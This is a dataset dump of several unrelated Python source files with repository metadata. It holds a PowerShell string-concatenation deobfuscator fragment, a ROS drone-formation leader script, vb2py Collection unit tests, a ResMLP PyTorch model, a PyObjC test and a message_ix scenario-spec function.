        def concat(data):
            strlit = Ps1StringLiterals(data)
            repeat = True
            while repeat:
                for match in self._SENTINEL.finditer(data):
                    a, b = match.span()
                    # Both ends of the operator must sit inside string
                    # literals, and those literals must be adjacent.
                    a = strlit.get_container(a)
                    if a is None:
                        continue
                    b = strlit.get_container(b)
                    if b is None or b != a + 1:
                        continue
                    a = strlit.ranges[a]
                    b = strlit.ranges[b]
                    stra = data[slice(*a)]
                    strb = data[slice(*b)]
                    # Fuse: the last piece of the first literal is merged
                    # with the first piece of the second.
                    parts = list(string_unquote(stra))
                    it = iter(string_unquote(strb))
                    parts[~0] += next(it)
                    parts.extend(it)
                    # Emit everything up to and including the merged literal,
                    # then restart the scan on the remainder.
                    yield data[:a[0]] + string_quote(parts)
                    data = data[b[1]:]
                    strlit.update(data)
                    break
                else:
                    repeat = False
            yield data
        return ''.join(concat(data))
|
[
"rattle@nullteilerfrei.de"
] |
rattle@nullteilerfrei.de
|
6fc3e353a8326a114fc60b18e3229535220c28c9
|
0a118477c8b6d1ef79b26310a1d3fb06716743e9
|
/contributer_demo/demo2/coordination/formation_demo/my_leader.py
|
6a3f3c47ca5aa8e260d12d37928babc195285821
|
[
"MIT"
] |
permissive
|
nsgcjdsz/XTDrone
|
773ea65421044a895e427cfc68d9e3669210c12a
|
ebefd6cf943b95998e1b47de6be9052a146d667d
|
refs/heads/master
| 2023-08-25T18:12:48.338686
| 2021-10-23T12:03:47
| 2021-10-23T12:03:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,406
|
py
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import rospy
from geometry_msgs.msg import Twist, Vector3, PoseStamped
from std_msgs.msg import String
from pyquaternion import Quaternion
import time
import math
import numpy
import sys
#if sys.argv[2] == '6': # formation_dict is a module in this folder
#    from formation_dict import formation_dict_6 as formation_dict
#elif sys.argv[2] == '9':
#    from formation_dict import formation_dict_9 as formation_dict
#elif sys.argv[2] == '18':
#    from formation_dict import formation_dict_18 as formation_dict
# Pick the formation table by swarm size (argv[2]); note both supported
# sizes currently load the same dictionary.
if sys.argv[2] == '21':
    from my_formation_dict import formation_dict_my as formation_dict
elif sys.argv[2] == '34':
    from my_formation_dict import formation_dict_my as formation_dict
class Leader:
    """Formation leader UAV: relays velocity commands, its own pose and
    formation-switch commands to the follower vehicles over ROS topics."""

    def __init__(self, uav_type, leader_id, uav_num):
        self.hover = True
        self.id = leader_id
        self.local_pose = PoseStamped()
        self.cmd_vel_enu = Twist()
        # Everyone except the leader itself is a follower.
        self.follower_num = uav_num - 1
        self.followers_info = ["Moving"]*self.follower_num
        self.follower_arrived_num = 0
        self.follower_all_arrived = True
        self.avoid_accel = Vector3(0,0,0)
        self.formation_config = 'waiting'
        self.target_height_recorded = False
        self.cmd = String()
        self.f = 200  # control-loop frequency (Hz)
        self.Kz = 0.5  # proportional gain of the altitude controller
        self.local_pose_sub = rospy.Subscriber(uav_type+'_'+str(self.id)+"/mavros/local_position/pose", PoseStamped , self.local_pose_callback)
        self.cmd_vel_sub = rospy.Subscriber("/xtdrone/leader/cmd_vel_flu", Twist, self.cmd_vel_callback)
        self.avoid_vel_sub = rospy.Subscriber("/xtdrone/"+uav_type+'_'+str(self.id)+"/avoid_accel", Vector3, self.avoid_accel_callback)
        self.leader_cmd_sub = rospy.Subscriber("/xtdrone/leader/cmd",String, self.cmd_callback)
        for i in range(self.follower_num): # subscribe to every follower's status topic
            rospy.Subscriber('/xtdrone/'+uav_type+'_'+str(i+1)+'/info',String,self.followers_info_callback,i)
        self.local_pose_pub = rospy.Publisher("/xtdrone/leader/pose", PoseStamped , queue_size=10)
        self.formation_switch_pub = rospy.Publisher("/xtdrone/formation_switch",String, queue_size=10)
        self.vel_enu_pub = rospy.Publisher('/xtdrone/'+uav_type+'_'+str(self.id)+'/cmd_vel_enu', Twist, queue_size=10)
        self.cmd_pub = rospy.Publisher('/xtdrone/'+uav_type+'_'+str(self.id)+'/cmd', String, queue_size=10)
    def local_pose_callback(self, msg):
        # Cache the latest local pose from MAVROS.
        self.local_pose = msg
    def cmd_vel_callback(self, msg):
        self.cmd_vel_enu = msg
        if msg.linear.z == 0:
            self.hover = True # hover when no vertical velocity is commanded
        else:
            self.hover = False
    def cmd_callback(self, msg):
        # A known formation name switches the formation; anything else is
        # forwarded verbatim as a vehicle command.
        if msg.data in formation_dict.keys():
            self.formation_config = msg.data
        else:
            self.cmd = msg.data
    def avoid_accel_callback(self, msg):
        # Collision-avoidance acceleration, mixed into the velocity in loop().
        self.avoid_accel = msg
    def followers_info_callback(self, msg, id):
        self.followers_info[id] = msg.data
        #print("follower"+str(id)+":"+ msg.data)
    def loop(self):
        """Main control loop at ``self.f`` Hz: publish velocity (with the
        avoidance acceleration mixed in), pose and pending command."""
        rospy.init_node('leader')
        rate = rospy.Rate(self.f)
        while True:
            #self.cmd_vel_enu = Twist()
            # NOTE(review): follower_arrived_num is never reset between loop
            # iterations, so arrivals accumulate across passes -- confirm
            # this is intentional.
            for follower_info in self.followers_info:
                if follower_info == "Arrived": # one follower reports arrival
                    self.follower_arrived_num += 1
            if self.follower_arrived_num > self.follower_num - 1:
                self.follower_all_arrived = True # every follower has arrived
            if self.follower_all_arrived:
                self.formation_switch_pub.publish(self.formation_config)
            if self.formation_config == 'pyramid':
                # Record a target 2 m above the altitude at the moment the
                # 'pyramid' formation starts; target_height persists across
                # iterations of this while-loop.
                if not self.target_height_recorded:
                    target_height = self.local_pose.pose.position.z + 2
                    self.target_height_recorded = True
                self.cmd_vel_enu.linear.z = self.Kz * (target_height - self.local_pose.pose.position.z)
            self.cmd_vel_enu.linear.x += self.avoid_accel.x
            self.cmd_vel_enu.linear.y += self.avoid_accel.y
            self.cmd_vel_enu.linear.z += self.avoid_accel.z
            self.vel_enu_pub.publish(self.cmd_vel_enu)
            self.local_pose_pub.publish(self.local_pose)
            self.cmd_pub.publish(self.cmd)
            rate.sleep()
if __name__ == '__main__':
    # argv: [uav_type, uav_num]; the leader is always vehicle 0.
    leader = Leader(sys.argv[1], 0, int(sys.argv[2]))
    leader.loop()
|
[
"robin_shaun@foxmail.com"
] |
robin_shaun@foxmail.com
|
8766db5f17f73ece19a8e050eb0f6c2da93a0634
|
02d8a026d63127f045042e03e23acbe6c9675db8
|
/vb2py/test/testcollection.py
|
68f0506871cd8ec816e607dfee324b6b6168fe80
|
[
"BSD-3-Clause"
] |
permissive
|
VB6Hobbyst7/xl_vb2py
|
40e77976b452732575e2726fb1f0675b1ab9f86f
|
899fec0301140fd8bd313e8c80b3fa839b3f5ee4
|
refs/heads/main
| 2023-07-28T20:12:11.933183
| 2021-09-23T18:12:02
| 2021-09-23T18:12:02
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,618
|
py
|
from vb2py.vbclasses import Collection
import unittest
class TestCollection(unittest.TestCase):
    """Tests for the VB6-compatible Collection class: 1-based numeric
    indexing plus optional string keys, with Before/After insertion."""

    def setUp(self):
        """Set up the test"""
        self.c = Collection()
    # << Collection tests >> (1 of 9)
    def testAddNumeric(self):
        """testAddNumeric: should be able to add with numeric indexes"""
        for i in range(10):
            self.c.Add(i)
        for expect, actual in zip(list(range(10)), self.c):
            self.assertEqual(expect, actual)
        self.assertEqual(self.c.Count(), 10)
    # << Collection tests >> (2 of 9)
    def testAddBeforeNumeric(self):
        """testAddBeforeNumeric: should be able to add something before something else"""
        # Put 1 ... 9 in with 5 missing
        for i in range(1, 10):
            if i != 5:
                self.c.Add(i)
        self.c.Add(5, Before=5) # ie before the index 5
        for expect, actual in zip(list(range(1, 10)), self.c):
            self.assertEqual(expect, actual)
        self.assertEqual(self.c.Count(), 9)
    # << Collection tests >> (3 of 9)
    def testAddAfterNumeric(self):
        """testAddAfterNumeric: should be able to add something after something else"""
        # Put 1 ... 9 in with 5 missing
        for i in range(1, 10):
            if i != 5:
                self.c.Add(i)
        self.c.Add(5, After=4)
        for expect, actual in zip(list(range(1, 10)), self.c):
            self.assertEqual(expect, actual)
        self.assertEqual(self.c.Count(), 9)
    # << Collection tests >> (4 of 9)
    def testAddText(self):
        """testAddText: should be able to add with text indexes"""
        for i in range(10):
            self.c.Add(i, "txt%d" % i)
        for expect, actual in zip(list(range(10)), self.c):
            self.assertEqual(expect, actual)
        self.assertEqual(self.c.Count(), 10)
    # << Collection tests >> (5 of 9)
    def testAddTextandNumeric(self):
        """testAddTextandNumeric: should be able to add with text and numeric indexes"""
        for i in range(10):
            self.c.Add(i, "txt%d" % i)
            self.c.Add(i)
        for i in range(10):
            self.assertEqual(self.c.Item("txt%d" % i), i)
            # Numeric lookup is 1-based; the plain copies sit at even slots.
            self.assertEqual(self.c.Item(i*2+2), i)
        self.assertEqual(self.c.Count(), 20)
    # << Collection tests >> (6 of 9)
    def testItemNumeric(self):
        """testItemNumeric: should be able to get with numeric indexes"""
        for i in range(10):
            self.c.Add(i)
        for i in range(10):
            self.assertEqual(i, self.c.Item(i+1))
    # << Collection tests >> (7 of 9)
    def testItemText(self):
        """testItemText: should be able to get with text indexes"""
        for i in range(10):
            self.c.Add(i, "txt%d" % i)
        for i in range(10):
            self.assertEqual(i, self.c.Item("txt%d" % i))
    # << Collection tests >> (8 of 9)
    def testRemoveNumeric(self):
        """testRemoveNumeric: should be able to remove with numeric indexes"""
        for i in range(10):
            self.c.Add(i+1)
        self.c.Remove(5)
        self.assertEqual(self.c.Count(), 9)
        for i in self.c:
            self.assertNotEqual(i, 5)
    # << Collection tests >> (9 of 9)
    def testRemoveText(self):
        """testRemoveText: should be able to remove with text indexes"""
        for i in range(10):
            self.c.Add(i, "txt%d" % i)
        self.c.Remove("txt%d" % 5)
        self.assertEqual(self.c.Count(), 9)
        for i in self.c:
            self.assertNotEqual(i, 5)
    # -- end -- << Collection tests >>
if __name__ == "__main__":
    unittest.main()
|
[
"c.git@pronovost.net"
] |
c.git@pronovost.net
|
5d4d2ed476aea05494ec90081e7dd8d67f9f8cb0
|
602ea2edb853c5561a45b6aa2783ac894ef408e4
|
/res_mlp_pytorch/res_mlp_pytorch.py
|
1ac60d23a7068840b29608111b116cc789825440
|
[
"MIT"
] |
permissive
|
BadGuy-wang/res-mlp-pytorch
|
427d6f1f2279dcfe59d7cee02befb26a0a4dad79
|
562814a406cc418bdb4710aa3bdc569206ac171b
|
refs/heads/main
| 2023-05-05T13:22:46.575901
| 2021-06-03T22:30:40
| 2021-06-03T22:30:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,989
|
py
|
import torch
from torch import nn, einsum
from einops.layers.torch import Rearrange, Reduce
# helpers
def pair(val):
    """Return *val* unchanged if it is a tuple, else duplicate it into a 2-tuple."""
    if isinstance(val, tuple):
        return val
    return (val, val)
# classes
class Affine(nn.Module):
    """Channel-wise affine map ``y = g * x + b``; ``g`` starts at ones and
    ``b`` at zeros, broadcast over the batch and sequence dimensions."""

    def __init__(self, dim):
        super().__init__()
        self.g = nn.Parameter(torch.ones(1, 1, dim))
        self.b = nn.Parameter(torch.zeros(1, 1, dim))

    def forward(self, x):
        # Same computation as ``x * self.g + self.b``, written method-style.
        return x.mul(self.g).add(self.b)
class PreAffinePostLayerScale(nn.Module): # https://arxiv.org/abs/2103.17239
    """Residual wrapper: pre-Affine normalization, then *fn*, then a learned
    per-channel LayerScale before adding the skip connection."""

    def __init__(self, dim, depth, fn):
        super().__init__()
        # LayerScale initial value shrinks with network depth (CaiT paper).
        if depth <= 18:
            init_eps = 0.1
        elif depth <= 24:
            init_eps = 1e-5
        else:
            init_eps = 1e-6
        self.scale = nn.Parameter(torch.full((1, 1, dim), init_eps))
        self.affine = Affine(dim)
        self.fn = fn

    def forward(self, x):
        return x + self.scale * self.fn(self.affine(x))
def ResMLP(*, image_size, patch_size, dim, depth, num_classes, expansion_factor = 4):
    """Build a ResMLP image classifier as an ``nn.Sequential``.

    Keyword-only args: image size (int or (h, w) tuple), patch size,
    embedding dim, number of residual blocks, class count and the MLP
    expansion factor. Assumes 3-channel input (see the hard-coded ``* 3``).
    """
    image_height, image_width = pair(image_size)
    assert (image_height % patch_size) == 0 and (image_width % patch_size) == 0, 'image height and width must be divisible by patch size'
    num_patches = (image_height // patch_size) * (image_width // patch_size)
    # Each residual sublayer is wrapped in a depth-indexed LayerScale.
    wrapper = lambda i, fn: PreAffinePostLayerScale(dim, i + 1, fn)
    return nn.Sequential(
        # Patchify: (b, c, h, w) -> (b, patches, patch_pixels * c), then embed.
        Rearrange('b c (h p1) (w p2) -> b (h w) (p1 p2 c)', p1 = patch_size, p2 = patch_size),
        nn.Linear((patch_size ** 2) * 3, dim),
        *[nn.Sequential(
            # Cross-patch sublayer: 1x1 conv mixes information across patches.
            wrapper(i, nn.Conv1d(num_patches, num_patches, 1)),
            # Per-patch feed-forward sublayer.
            wrapper(i, nn.Sequential(
                nn.Linear(dim, dim * expansion_factor),
                nn.GELU(),
                nn.Linear(dim * expansion_factor, dim)
            ))
        ) for i in range(depth)],
        Affine(dim),
        # Mean-pool over patches, then classify.
        Reduce('b n c -> b c', 'mean'),
        nn.Linear(dim, num_classes)
    )
|
[
"lucidrains@gmail.com"
] |
lucidrains@gmail.com
|
312b52cb1b4319add74ab61694c18b56da2451a1
|
f80ef3a3cf859b13e8af8433af549b6b1043bf6e
|
/pyobjc-framework-Cocoa/PyObjCTest/test_nscolorsampler.py
|
1b666e6faca75d95e31360218b6b1b293f053d99
|
[
"MIT"
] |
permissive
|
ronaldoussoren/pyobjc
|
29dc9ca0af838a56105a9ddd62fb38ec415f0b86
|
77b98382e52818690449111cd2e23cd469b53cf5
|
refs/heads/master
| 2023-09-01T05:15:21.814504
| 2023-06-13T20:00:17
| 2023-06-13T20:00:17
| 243,933,900
| 439
| 49
| null | 2023-06-25T02:49:07
| 2020-02-29T08:43:12
|
Python
|
UTF-8
|
Python
| false
| false
| 290
|
py
|
import AppKit
from PyObjCTools.TestSupport import TestCase, min_os_level
class TestNSColorSampler(TestCase):
    # NSColorSampler was introduced in macOS 10.15 (Catalina).
    @min_os_level("10.15")
    def test_methods_10_15(self):
        # Argument 0 of showSamplerWithSelectionHandler: must be a block
        # with Objective-C signature b"v@" (void return, one object arg).
        self.assertArgIsBlock(
            AppKit.NSColorSampler.showSamplerWithSelectionHandler_, 0, b"v@"
        )
|
[
"ronaldoussoren@mac.com"
] |
ronaldoussoren@mac.com
|
36cc0b54b41fcc7f8fe680953ecdd8685005c0bc
|
6a746abb4dd3f2e0538936f272ed5d051a120c5b
|
/message_ix_models/model/build.py
|
f92ab09a1bd72b04109c697d15c7faf224e8c6b0
|
[
"Apache-2.0"
] |
permissive
|
OFR-IIASA/message-ix-models
|
d902d26c10db8215a856032d09f4252e16500c99
|
7459065505f8f3a418086aa620b789b5c5f39cde
|
refs/heads/main
| 2023-06-15T00:16:56.654237
| 2021-07-02T09:33:49
| 2021-07-02T09:33:49
| 380,197,167
| 0
| 0
|
Apache-2.0
| 2021-06-25T10:01:47
| 2021-06-25T10:01:47
| null |
UTF-8
|
Python
| false
| false
| 4,795
|
py
|
import logging
from typing import Callable, Dict, Mapping
import pandas as pd
from ixmp.utils import maybe_check_out, maybe_commit
from message_ix import Scenario
from sdmx.model import Code
from message_ix_models.util import add_par_data, strip_par_data
from message_ix_models.util.scenarioinfo import ScenarioInfo
log = logging.getLogger(__name__)
def apply_spec(
    scenario: Scenario,
    spec: Mapping[str, ScenarioInfo],
    data: Optional[Callable] = None,
    **options,
):
    """Apply `spec` to `scenario`.

    Parameters
    ----------
    spec
        A 'specification': :class:`dict` with 'require', 'remove', and 'add' keys and
        :class:`.ScenarioInfo` objects as values.
    data : callable, optional
        Function to add data to `scenario`. `data` can either manipulate the scenario
        directly, or return a :class:`dict` compatible with :func:`.add_par_data`.

    Other parameters
    ----------------
    dry_run : bool
        Don't modify `scenario`; only show what would be done. Default :obj:`False`.
        Exceptions will still be raised if the elements from ``spec['required']`` are
        missing; this serves as a check that the scenario has the required features for
        applying the spec.
    fast : bool
        Do not remove existing parameter data; increases speed on large scenarios.
    quiet : bool
        Only show log messages at level ``ERROR`` and higher. If :obj:`False` (default),
        show log messages at level ``DEBUG`` and higher.
    message : str
        Commit message.

    Raises
    ------
    ValueError
        if any element in ``spec['require']`` is missing from the respective set
        in `scenario`.

    See also
    --------
    .add_par_data
    .strip_par_data
    .Code
    .ScenarioInfo
    """
    dry_run = options.get("dry_run", False)

    # NB this mutates the module-level logger's threshold, implementing `quiet`
    log.setLevel(logging.ERROR if options.get("quiet", False) else logging.DEBUG)

    if not dry_run:
        try:
            scenario.remove_solution()
        except ValueError:
            pass  # Scenario had no solution to remove
        maybe_check_out(scenario)

    dump: Dict[str, pd.DataFrame] = {}  # Removed data

    for set_name in scenario.set_list():
        # Check whether this set is mentioned at all in the spec
        if 0 == sum(map(lambda info: len(info.set[set_name]), spec.values())):
            # Not mentioned; don't do anything
            continue

        log.info(f"Set {repr(set_name)}")

        # Base contents of the set
        base_set = scenario.set(set_name)
        # Unpack a multi-dimensional/indexed set to a list of tuples
        base = (
            list(base_set.itertuples(index=False))
            if isinstance(base_set, pd.DataFrame)
            else base_set.tolist()
        )

        log.info(f"  {len(base)} elements")
        # log.debug(', '.join(map(repr, base)))  # All elements; verbose

        # Check for required elements
        require = spec["require"].set[set_name]
        log.info(f"  Check {len(require)} required elements")

        # Raise an exception about the first missing element
        missing = list(filter(lambda e: e not in base, require))
        if len(missing):
            msg = f"  {len(missing)} elements not found: {repr(missing)}"
            log.error(msg)
            # Include the details in the exception so callers see what is missing
            raise ValueError(msg)

        # Remove elements and associated parameter values
        remove = spec["remove"].set[set_name]
        for element in remove:
            msg = f"{repr(element)} and associated parameter elements"

            if options.get("fast", False):
                log.info(f"  Skip removing {msg} (fast=True)")
                continue

            log.info(f"  Remove {msg}")
            strip_par_data(scenario, set_name, element, dry_run=dry_run, dump=dump)

        # Add elements (skipped entirely on a dry run)
        add = [] if dry_run else spec["add"].set[set_name]
        for element in add:
            scenario.add_set(
                set_name,
                # sdmx Code objects are stored by their id; plain values as-is
                element.id if isinstance(element, Code) else element,
            )

        if len(add):
            log.info(f"  Add {len(add)} element(s)")
            log.debug("  " + ", ".join(map(repr, add)))

        log.info("  ---")

    n_removed = sum(len(d) for d in dump.values())
    log.info(f"{n_removed} parameter elements removed")

    # Add units to the Platform before adding data
    for unit in spec["add"].set["unit"]:
        # Normalize plain strings to Code so id/name are uniform below
        unit = unit if isinstance(unit, Code) else Code(id=unit, name=unit)
        log.info(f"Add unit {repr(unit)}")
        scenario.platform.add_unit(unit.id, comment=str(unit.name))

    # Add data
    if callable(data):
        result = data(scenario, dry_run=dry_run)
        if result:
            # `data` function returned some data; use add_par_data()
            add_par_data(scenario, result, dry_run=dry_run)

    # Finalize
    log.info("Commit results.")
    maybe_commit(
        scenario,
        condition=not dry_run,
        message=options.get("message", f"{__name__}.apply_spec()"),
    )
|
[
"mail@paul.kishimoto.name"
] |
mail@paul.kishimoto.name
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.